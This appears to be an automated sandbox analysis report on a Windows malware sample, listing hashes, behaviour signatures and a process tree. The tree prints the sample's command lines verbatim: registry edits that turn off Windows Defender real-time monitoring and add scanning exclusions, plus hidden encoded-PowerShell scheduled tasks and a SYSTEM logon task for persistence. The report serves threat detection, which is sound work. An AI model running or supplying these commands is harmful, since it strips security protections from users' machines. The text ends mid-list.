Analysis
-
max time kernel
152s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
11-05-2023 18:48
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
95847f9fce54f3c792bb0cc069a025c8
-
SHA1
9c5c6647ec35e1719581ae0bf3bc710f6c8b5d5c
-
SHA256
6d7bfc2ddcdea1d8f1ed756c58853ae3338afc9198e6bb4882d9f9df0ef3d862
-
SHA512
469d1564c57ef5444f636f1b07aeaca54c1bdab2c1290528a4f2727811b375cf4963b79cf0e53b82552a822ab14b02b37be637111640238546034a46c6c85863
-
SSDEEP
196608:91OKdZBePTgfIKCicyeJ9lTEraK6jDstqn0H5AhksAwv:3OyfePkTHpeJ9lTI7hZMv
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 8 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS5014.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS5513.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsDPmbYlM" /SC once /ST 13:05:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsDPmbYlM"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsDPmbYlM"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbXoAwMbDRqGwpaHzT" /SC once /ST 18:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY\PkhyGLXYfNEbthO\EqSeURi.exe\" dk /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B27B97B8-4703-41AC-B6EA-B613D3726AD6} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {035E63A0-0B8C-4ED0-A68D-B9F662432C81} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY\PkhyGLXYfNEbthO\EqSeURi.exeC:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY\PkhyGLXYfNEbthO\EqSeURi.exe dk /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQpgSyLHT" /SC once /ST 04:24:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQpgSyLHT"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQpgSyLHT"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjrcfWMjx" /SC once /ST 16:51:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjrcfWMjx"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjrcfWMjx"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\UlGsgVFWrfmwSkkD\bMUgAfpQ\eLIUmzTmWQkJiULR.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\UlGsgVFWrfmwSkkD\bMUgAfpQ\eLIUmzTmWQkJiULR.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJemnJPHU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJemnJPHU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QlUqjwQLKgwemWkLtfR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QlUqjwQLKgwemWkLtfR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iItkltQkPYUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gDseFfFHymBjC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gDseFfFHymBjC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iItkltQkPYUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iYOoVaBuYJdU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iYOoVaBuYJdU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WXwnXrQJmNgdksVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WXwnXrQJmNgdksVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJemnJPHU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJemnJPHU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QlUqjwQLKgwemWkLtfR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QlUqjwQLKgwemWkLtfR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gDseFfFHymBjC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gDseFfFHymBjC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iItkltQkPYUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iItkltQkPYUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iYOoVaBuYJdU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iYOoVaBuYJdU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WXwnXrQJmNgdksVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WXwnXrQJmNgdksVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jFYNCYhROueFLJolY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UlGsgVFWrfmwSkkD" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gokKGssFh" /SC once /ST 14:42:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gokKGssFh"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gokKGssFh"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OnsXjgPYTDvNeiHSN" /SC once /ST 05:37:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UlGsgVFWrfmwSkkD\DiqJHDvRWlllzci\dbOevXm.exe\" KC /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "OnsXjgPYTDvNeiHSN"3⤵
-
-
-
C:\Windows\Temp\UlGsgVFWrfmwSkkD\DiqJHDvRWlllzci\dbOevXm.exeC:\Windows\Temp\UlGsgVFWrfmwSkkD\DiqJHDvRWlllzci\dbOevXm.exe KC /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbXoAwMbDRqGwpaHzT"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJemnJPHU\Nvcwjk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "TcVNwhqOGWdpaeV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "411437700-69604890-11075785431307017389-211372811813403100121380923291-533294717"1⤵
- Windows security bypass
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5abee6a7b5b411afc8fa69c9b6f6595f9
SHA118d2c575c9469af30604ea1076431fbf09137a29
SHA256735b3e5f14b038b0fc0f425e8aa654214d66c043dec21d52149444097852bec9
SHA5127664d5807885cdc99c013c01ee99814f10be85a05520335bf2ae1d5ae002fd5ae60df45a758aab6fe533c986dc510b6b3b218b9150b8ec15408217b315acc4db
-
Filesize
6.3MB
MD5abee6a7b5b411afc8fa69c9b6f6595f9
SHA118d2c575c9469af30604ea1076431fbf09137a29
SHA256735b3e5f14b038b0fc0f425e8aa654214d66c043dec21d52149444097852bec9
SHA5127664d5807885cdc99c013c01ee99814f10be85a05520335bf2ae1d5ae002fd5ae60df45a758aab6fe533c986dc510b6b3b218b9150b8ec15408217b315acc4db
-
Filesize
6.8MB
MD5ac22aca46b675940be75b6ab5fb187a7
SHA1e46465fe2aabaa43a7f5347475c07ed6cace1a6f
SHA256f920bc0ea83fc32dbea9676c98392070f06feea8128d784920a07256d5bd4c00
SHA512ab2faa82f6d68e48eec1d1f3ad1bbe59fea2d8edc22b4416095a4b5d1f055cd14935bb08e3ba265be2fcd73b4faf72d8d8447777742d0e05b524d51ae053dd2c
-
Filesize
6.8MB
MD5ac22aca46b675940be75b6ab5fb187a7
SHA1e46465fe2aabaa43a7f5347475c07ed6cace1a6f
